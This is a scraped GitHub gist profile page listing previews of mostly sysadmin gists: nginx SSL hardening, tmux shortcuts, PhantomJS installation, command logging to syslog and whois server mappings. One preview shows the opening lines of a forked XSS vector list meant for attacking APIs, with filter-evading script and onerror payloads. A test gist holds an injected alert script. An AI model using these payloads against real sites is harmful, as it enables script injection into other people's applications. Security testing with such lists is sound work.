Skip to content

Instantly share code, notes, and snippets.

View h4ck3root's full-sized avatar
:shipit:
I may be slow to respond.

Colin Shen h4ck3root

:shipit:
I may be slow to respond.
2 followers · 7 following
  • Taipei
View GitHub Profile
@h4ck3root
h4ck3root / gcloud_cheat_sheet.md
Created July 16, 2019 09:53 — forked from pydevops/gcloud-cheat-sheet.md
gcp gcloud cheat sheet
@h4ck3root
h4ck3root / nginx.conf
Created April 29, 2019 10:00 — forked from fotock/nginx.conf
Nginx SSL 安全配置最佳实践.
# 生成 dhparam.pem 文件, 在命令行执行任一方法:
# 方法1: 很慢
openssl dhparam -out /etc/nginx/ssl/dhparam.pem 2048
# 方法2: 较快
# 与方法1无明显区别. 2048位也足够用, 4096更强
openssl dhparam -dsaparam -out /etc/nginx/ssl/dhparam.pem 4096
@h4ck3root
h4ck3root / tmux-cheatsheet.markdown
Created March 20, 2018 11:08 — forked from ryerh/tmux-cheatsheet.markdown
Tmux 快捷键 & 速查表

Tmux 快捷键 & 速查表

启动新会话:

tmux [new -s 会话名 -n 窗口名]

恢复会话:

tmux at [-t 会话名]
@h4ck3root
h4ck3root / 666_lines_of_XSS_vectors.html
Created November 27, 2017 18:12 — forked from JohannesHoppe/666_lines_of_XSS_vectors.html
666 lines of XSS vectors, suitable for attacking an API copied from http://pastebin.com/48WdZR6L
<script\x20type="text/javascript">javascript:alert(1);</script>
<script\x3Etype="text/javascript">javascript:alert(1);</script>
<script\x0Dtype="text/javascript">javascript:alert(1);</script>
<script\x09type="text/javascript">javascript:alert(1);</script>
<script\x0Ctype="text/javascript">javascript:alert(1);</script>
<script\x2Ftype="text/javascript">javascript:alert(1);</script>
<script\x0Atype="text/javascript">javascript:alert(1);</script>
'`"><\x3Cscript>javascript:alert(1)</script>
'`"><\x00script>javascript:alert(1)</script>
<img src=1 href=1 onerror="javascript:alert(1)"></img>
@h4ck3root
h4ck3root / test.sh
Last active October 23, 2017 07:18
<script>alert('blood h4ck')</script>
TEST
@h4ck3root
h4ck3root / 00.howto_install_phantomjs.md
Created May 5, 2017 09:28 — forked from julionc/00.howto_install_phantomjs.md
How to install PhantomJS on Debian/Ubuntu

How to install PhantomJS on Ubuntu

Version: 1.9.8

Platform: x86_64

First, install or update to the latest system software.

sudo apt-get update
sudo apt-get install build-essential chrpath libssl-dev libxft-dev
@h4ck3root
h4ck3root / log-all-zsh-bash-commands-syslog.md
Created March 8, 2017 10:26 — forked from dayreiner/log-all-zsh-bash-commands-syslog.md
Log all users zsh / bash commands via syslog without 3rd-party tools or auditd

Sending Bash and ZSH Commands to Syslog

Also posted here: http://18pct.com/sending-bash-and-zsh-commands-to-syslog/

Your bash/zsh history is great if its complete, but it doesn't capture commands across all users, sudo's, root commands etc. In particular with test environments, someone may perform a "one-off" procedure and then months later it needs to be repeated. It would be nice to be able to look up what the user did at the time, and searching through multiple, possibly truncated history files is a pain.

Tools like typescript are great if you're actively documenting, but not something you would use all the time in practice and capture more than just a history of your commands. There are third-party tools like rootsh and Snoopy that can accomplish this, but third-party tools can be overkill if all you want is a quick reference in a re

@h4ck3root
h4ck3root / log-all-zsh-bash-commands-syslog.md
Created March 8, 2017 10:26 — forked from dayreiner/log-all-zsh-bash-commands-syslog.md
Log all users zsh / bash commands via syslog without 3rd-party tools or auditd

Sending Bash and ZSH Commands to Syslog

Also posted here: http://18pct.com/sending-bash-and-zsh-commands-to-syslog/

Your bash/zsh history is great if its complete, but it doesn't capture commands across all users, sudo's, root commands etc. In particular with test environments, someone may perform a "one-off" procedure and then months later it needs to be repeated. It would be nice to be able to look up what the user did at the time, and searching through multiple, possibly truncated history files is a pain.

Tools like typescript are great if you're actively documenting, but not something you would use all the time in practice and capture more than just a history of your commands. There are third-party tools like rootsh and Snoopy that can accomplish this, but third-party tools can be overkill if all you want is a quick reference in a re

@h4ck3root
h4ck3root / log-all-zsh-bash-commands-syslog.md
Created March 8, 2017 10:26 — forked from dayreiner/log-all-zsh-bash-commands-syslog.md
Log all users zsh / bash commands via syslog without 3rd-party tools or auditd

Sending Bash and ZSH Commands to Syslog

Also posted here: http://18pct.com/sending-bash-and-zsh-commands-to-syslog/

Your bash/zsh history is great if its complete, but it doesn't capture commands across all users, sudo's, root commands etc. In particular with test environments, someone may perform a "one-off" procedure and then months later it needs to be repeated. It would be nice to be able to look up what the user did at the time, and searching through multiple, possibly truncated history files is a pain.

Tools like typescript are great if you're actively documenting, but not something you would use all the time in practice and capture more than just a history of your commands. There are third-party tools like rootsh and Snoopy that can accomplish this, but third-party tools can be overkill if all you want is a quick reference in a re

@h4ck3root
h4ck3root / whois.conf
Created January 11, 2017 07:28 — forked from thde/whois.conf
/etc/whois.conf WHOIS records for nTLDs (https://thde.io/whois-command-line-new-gtld-guru-watch-zone-link/)
##
# WHOIS servers for new TLDs (http://www.iana.org/domains/root/db)
# Current as of 2016-10-07
##
\.aarp$ whois.nic.aarp
\.abarth$ whois.afilias-srs.net
\.abbott$ whois.afilias-srs.net
\.abbvie$ whois.afilias-srs.net
\.abc$ whois.nic.abc